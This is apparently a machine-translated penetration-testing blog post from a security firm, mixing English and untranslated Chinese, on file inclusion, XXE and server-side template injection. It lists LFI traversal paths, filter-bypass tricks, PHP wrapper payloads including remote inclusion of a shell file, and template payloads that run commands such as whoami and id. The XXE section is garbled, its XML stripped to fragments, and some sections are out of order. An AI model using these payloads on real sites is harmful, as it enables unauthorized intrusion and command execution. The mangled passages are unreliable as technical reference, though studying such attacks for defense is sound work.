Shulou(Shulou.com)06/01 Report--

Yesterday gave you the popularity of penetration testing to execute command vulnerabilities detection methods, today take the time from our Sine security penetration engineers to say that the file contains vulnerabilities and template injection vulnerabilities detection methods and defense means, this article only refers to the authorized penetration testing of formal security testing customers, so that more customers understand the specific testing content, is how to conduct a comprehensive website security testing.

3.8. The file contains

3.8.1. Basics

Common files contain vulnerabilities in the form of

Consider several commonly used ways to include

The same directory contains file=.htaccess directory traversal? file=../var/lib/locate.db log injection? file=../var/log/apache/error.log utilization / proc/self/environ

Logs can be tested from multiple log sources such as SSH logs or Web logs.

3.8.2. Bypass technique

Common applications may call functions to judge a file before it is included, and there are generally several ways to bypass it

3.8.2.1. Url coding bypass

If there is a string match in WAF, you can use url encoding multiple times to bypass

3.8.2.2. Special character bypass

In some cases, reading files supports the use of Shell wildcards, such as? # in url such as? # may affect the results contained in include. In some cases, characters with different unicode encodings but similar glyphs have the same effect.

3.8.2.3. Truncation

Is almost the most commonly used method, provided that magic_quotes_gpc is turned on and the php version is less than 5.3.4.

3.8.2.4. Length truncation

The length of the file name on Windows is related to the file path. The specific relationship is as follows: calculated from the root directory, the longest file path length is 259 bytes.

Msdn defines "`# define MAX_PATH 260"`, and the 260 characters are the "`0" `at the end of the string.

Linux can use getconf to determine file name length limit and file path length limit.

Get the longest file path length: getconf PATH_MAX / root get 4096 get the longest file name: getconf NAME_MAX / root get 4096

Then when the length is limited, the path can be blown out in the form of `. /` (n).

In php code inclusion, this bypass requires the php version

< php 5.2.8 3.8.2.5. 伪协议绕过 远程包含: 要求 allow_url_fopen=On and allow_url_include=On ， payload为 ?file=[http|https|ftp]://域名/shell.txt PHP INPUT: 把payload放在POST参数中作为包含的文件，要求 allow_url_include=On ，payload为 ?file=php://input: 使用伪协议读取文件，payload为 ?file=php://filter/convert.-encode/resource=index.phpDATA: 使用data伪协议读取文件，payload为 ?file=data://text/plain;,SSBsb3ZlIFBIUAo= 要求 allow_url_include=On 3.9. XXE 3.9.1. XML基础 XML 指可扩展标记语言（eXtensible Markup Language），是一种用于标记电子文件使其具有结构性的标记语言，被设计用来传输和存储数据。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。目前，XML文件作为配置文件（Spring、Struts2等）、文档结构说明文件（PDF、RSS等）、图片格式文件（SVG header）应用比较广泛。 3.9.2. XXE 当允许引用外部实体时，可通过构造恶意的XML内容，导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等后果。一般的XXE攻击，只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件，但是也可以通过Blind XXE的方式实现攻击。 3.9.3. 攻击方式 3.9.3.1. 拒绝服务攻击 ]>

& a2

If the parsing process is very slow, the test is successful and the target site may have a denial of service vulnerability. Specific attacks can use more layers of iteration or recursion, or large external entities can be referenced to achieve the effect of the attack.

3.9.3.2. File reading

] >

& file

3.9.3.3. SSRF

] >

four

3.9.3.4. RCE

] >

& xxe

3.9.3.5. XInclude

14 string expression {{"ajin"}} = > ajinRubyJava$ {7x7} Twig {{70007}} Smarty {php} echo `id` {/ php} AngularJS$eval ('1q1') Tornado reference module {% import module%} = > {% import os%} {{os.popen ("whoami") .read ()}} Flask/Jinja2 {'. _ _ class__.__mro__ [- 1]. _ subclasses__ ()}} Django {{request} {% debug%} {% load module%} {% include "x.html"%} {% extends "x.html"}%

3.10.4. target

Create an object file to read and write a remote file that contains information disclosure rights

3.10.5. Related attribute

3.10.5.1. _ _ class__

New classes in python (that is, classes that show inheriting object objects) have an attribute _ _ class__ that is used to get the class corresponding to the current instance. For example, ". _ _ class__ can get the class corresponding to the string instance.

3.10.5.2. _ _ mro__

The _ _ mro__ property of the class object in python returns a tuple object that contains all inherited base classes of the current class object, and the order of the elements in tuple is the order in which MRO (Method Resolution Order) looks.

3.10.5.3. _ _ globals__

All the global variables of the function are saved. In the process of utilization, you can use _ _ init__ to obtain the function of the object, and obtain modules such as file os through _ _ globals__ for further use.

3.10.5.4. _ _ subclasses__ ()

Python's new class retains references to all its subclasses, and the _ _ subclasses__ () method returns references to all surviving subclasses of the class (class object references, not instances).

Because all classes in python inherit object, you can get the object of the desired class simply by calling the _ _ subclasses__ () method of the object class object. The content and bypass techniques mentioned in this section of the penetration test, if you are not at ease about your own website, you can find a professional website security company to deal with the problem, such as Sinesafe, Green Alliance, Qiming Star and so on.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.